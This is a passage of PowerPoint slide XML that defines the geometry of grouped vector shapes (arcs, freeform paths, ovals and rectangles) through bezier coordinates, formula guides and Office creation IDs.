                    <a:path w="21600" h="41436" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41435"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="38031"/>
                        <a:pt x="0" y="30222"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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8" name="Arc 1102">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80A18C4-B09F-CC44-BEBB-522D2DED0391}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1224" y="2025"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21582 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13180 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41473 h 41473"/>
                    <a:gd name="T2" fmla="*/ 20728 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41473"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21582 h 41473"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41473" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41473"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38091"/>
                        <a:pt x="0" y="30257"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9991"/>
                        <a:pt x="9147" y="467"/>
                        <a:pt x="20727" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41473" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41473"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38091"/>
                        <a:pt x="0" y="30257"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66639" name="Arc 1103">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{989F45DD-2E23-F447-85BA-F73815E261D5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1252" y="2048"/>
                  <a:ext cx="42" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21027 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38844 w 38844"/>
                    <a:gd name="T1" fmla="*/ 12212 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38844"/>
                    <a:gd name="T3" fmla="*/ 4941 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21027 w 38844"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38844" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38843" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34816" y="18087"/>
                        <a:pt x="28150" y="21600"/>
                        <a:pt x="21027" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11001" y="21600"/>
                        <a:pt x="2293" y="14701"/>
                        <a:pt x="-1" y="4941"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38844" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38843" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34816" y="18087"/>
                        <a:pt x="28150" y="21600"/>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0" name="Arc 1104">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913E5D1C-BC6E-2842-BA50-9FFE7C5E9433}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1253" y="2048"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20977 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38540 w 38540"/>
                    <a:gd name="T1" fmla="*/ 12574 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38540"/>
                    <a:gd name="T3" fmla="*/ 5149 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20977 w 38540"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38540" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38539" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34483" y="18239"/>
                        <a:pt x="27944" y="21600"/>
                        <a:pt x="20977" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11030" y="21600"/>
                        <a:pt x="2370" y="14808"/>
                        <a:pt x="-1" y="5149"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38540" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38539" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34483" y="18239"/>
                        <a:pt x="27944" y="21600"/>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641" name="Group 1105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52887C12-12E1-4344-970D-A83241B84F07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1709" y="533"/>
              <a:ext cx="169" cy="168"/>
              <a:chOff x="961" y="2167"/>
              <a:chExt cx="169" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66642" name="Freeform 1106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA3F691-C513-D544-B20E-779C22E92693}"/>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3" name="Freeform 1107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{420FF78B-E36E-354D-A2F9-59E3D6050B5C}"/>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44" name="Rectangle 1108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7001BFA6-3B74-0849-BB12-479DF03AA8E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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45" name="Rectangle 1109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E3237B-82E3-844B-9971-6FA5BBB58CE6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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46" name="Freeform 1110">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C4CA35-4FB1-9B43-AB65-FF754218CED9}"/>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7" name="Freeform 1111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA964A41-7715-2448-87ED-D910F8B19D4D}"/>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48" name="Freeform 1112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60B0C7B-19F4-F547-8944-08C8EAC127F7}"/>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9" name="Freeform 1113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9246BF1-A776-B647-900C-754DF281BD73}"/>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650" name="Freeform 1114">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F4A6D7-AE73-9746-8611-4C1C1A17A31A}"/>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1" name="Freeform 1115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E999EB-5B2E-7F48-8EF2-66ED6C8E7C45}"/>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52" name="Rectangle 1116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC96B14-DE3C-6049-AC2D-949DEE6079C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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53" name="Rectangle 1117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA8F3AB-E2C0-9740-8FCC-342DE15517C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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654" name="Freeform 1118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A679736-821B-B245-B3DE-38633B85A206}"/>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5" name="Freeform 1119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFAEB1DA-F126-3643-A8F0-03E0648E2740}"/>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56" name="Freeform 1120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10E57A3-9C9F-5B47-B086-5B76C2240C06}"/>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7" name="Freeform 1121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD59CFB-C98C-8E47-B2BD-062106F3BB27}"/>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58" name="Freeform 1122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D82FE49D-03B1-C045-B52E-D2B6FD3DE2CB}"/>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9" name="Freeform 1123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60FD7BC3-CC7A-CE40-889C-8BCE84C2CD1B}"/>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60" name="Rectangle 1124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3DB9674-E556-8641-B522-005991BA3A05}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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61" name="Rectangle 1125">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EB7325-719A-E24C-8ACD-1FFA6A7BC119}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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662" name="Group 1126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC34690F-CD1B-364B-9322-F3961240671C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1753" y="571"/>
              <a:ext cx="93" cy="56"/>
              <a:chOff x="1005" y="2205"/>
              <a:chExt cx="93" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66663" name="Group 1127">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D827E3D-C9BA-774D-8CF8-4CE63E14E40D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="2205"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1005" y="2205"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66664" name="Oval 1128">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956A32A7-7DAE-E94F-8A9E-C9629135C7FE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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5" name="Oval 1129">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E542B492-DCAB-654C-AD14-A3EF86DDE4AE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1130">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32354446-DF16-4247-AD19-E3DD82D31385}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1131">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F9A9C86-DA05-8E4C-B47B-4919783A4AAC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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8" name="Oval 1132">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD84440-69A8-274D-827C-0A60A27A0988}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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9" name="Oval 1133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88ADDE49-691B-D44B-AC4F-F364662EB103}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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0" name="Oval 1134">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698F2DBF-B2DF-D047-B72E-9778A40828DE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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1" name="Oval 1135">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760CCFC9-8A24-344D-94D6-F378D5056866}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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2" name="Oval 1136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157B8984-ADFD-9E44-8B24-C35405F912C8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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673" name="Group 1137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CB7811-0B53-3D4F-A830-C041BFB0DAD4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="2205"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1005" y="2205"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66674" name="Arc 1138">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EDDC136-4087-4244-987D-A2D7BCC9DAA6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1039" y="2205"/>
                  <a:ext cx="38" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20350 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 40079"/>
                    <a:gd name="T1" fmla="*/ 14358 h 21600"/>
                    <a:gd name="T2" fmla="*/ 40079 w 40079"/>
                    <a:gd name="T3" fmla="*/ 12808 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20350 w 40079"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40079" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="14358"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3063" y="5749"/>
                        <a:pt x="11212" y="0"/>
                        <a:pt x="20350" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28878" y="0"/>
                        <a:pt x="36608" y="5017"/>
                        <a:pt x="40079" y="12807"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="40079" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="14358"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3063" y="5749"/>
                        <a:pt x="11212" y="0"/>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5" name="Arc 1139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F0F42ED-742A-4041-823A-1716D4BC23C6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1040" y="2206"/>
                  <a:ext cx="36" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20262 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 39867"/>
                    <a:gd name="T1" fmla="*/ 14117 h 21600"/>
                    <a:gd name="T2" fmla="*/ 39867 w 39867"/>
                    <a:gd name="T3" fmla="*/ 12534 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20262 w 39867"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39867" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="14116"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3132" y="5633"/>
                        <a:pt x="11218" y="0"/>
                        <a:pt x="20262" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28681" y="0"/>
                        <a:pt x="36333" y="4892"/>
                        <a:pt x="39867" y="12533"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39867" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="14116"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3132" y="5633"/>
                        <a:pt x="11218" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66676" name="Arc 1140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDF466D-CDAF-904D-83C7-ECF83A64BE95}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1015" y="2211"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 447 w 31958"/>
                    <a:gd name="T1" fmla="*/ 25972 h 25972"/>
                    <a:gd name="T2" fmla="*/ 31958 w 31958"/>
                    <a:gd name="T3" fmla="*/ 2646 h 25972"/>
                    <a:gd name="T4" fmla="*/ 21600 w 31958"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25972"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="31958" h="25972" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="447" y="25971"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="24533"/>
                        <a:pt x="0" y="23068"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25219" y="0"/>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0"/>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7" name="Arc 1141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1288A02C-DE84-B14B-AE28-5259616CBF8E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1016" y="2212"/>
                  <a:ext cx="21" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 465 w 31797"/>
                    <a:gd name="T1" fmla="*/ 26058 h 26058"/>
                    <a:gd name="T2" fmla="*/ 31797 w 31797"/>
                    <a:gd name="T3" fmla="*/ 2558 h 26058"/>
                    <a:gd name="T4" fmla="*/ 21600 w 31797"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26058"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="31797" h="26058" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="465" y="26057"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="24592"/>
                        <a:pt x="0" y="23098"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25157" y="0"/>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0"/>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678" name="Arc 1142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D281D60-E471-0E49-8A5D-30F6E3B78EBF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
